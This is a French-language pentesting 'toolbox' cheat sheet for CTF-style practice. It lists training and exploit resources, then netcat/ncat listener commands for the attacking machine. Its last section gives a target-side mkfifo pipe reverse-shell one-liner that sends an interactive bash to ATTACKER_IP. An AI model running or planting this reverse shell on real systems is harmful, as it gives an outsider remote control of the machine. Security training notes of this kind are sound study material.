Boîte à outils
Sommaire
1. Site web
- TryHackMe : Formations et exercices de cybersécurité
- HackTheBox : Formations et exercices de cybersécurité (aspect compétitif)
- GTFOBins : Techniques d’élévation de privilèges en exploitant les failles des binaires Linux
- LOLBAS : Equivalent de GTFOBins pour Windows
- PayloadsAllTheThings : Recueil de nombreuses charges permettant d’exploiter des vulnérabilités
- ExploitDB : Base recensant des vulnérabilités et les moyens de les exploiter
- CyberChef : Manipulation de données, chiffrement, déchiffrement
2. Commandes
2.1 Côté machine d’attaque
2.1.1 Mise en écoute
2.1.1.1 Plus simple, préinstallé : Netcat
netcat -lvnp 9000
# ou
nc -lvnp 9000
-l
: mode écoute (listen)-n
: pas de résolution DNS-v
: mode verbeux-p
: pour spécifier le port
2.1.1.2 Netcat amélioré : Ncat
Développé et distribué par l’équipe en charge de l’outil Nmap, ncat
intègre notamment le SSL pour interagir avec des shells chiffrés.
ncat -lvnp 9000
2.1.1.3 Activer l’historique de commandes
Par défaut, Netcat, quelque soit la version citée plus haut, ne permet pas d’utiliser les commandes précédentes avec la flèche du haut, contrairement au shell Linux de base.
rlwrap nc -lvnp 9000
Pour ma part, j’ai créé un alias pour utiliser rapidement la mise en écoute la plus complète possible :
alias nc='rlwrap ncat'
2.2 Côté cible
2.2.1 Pipe reverse shell
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f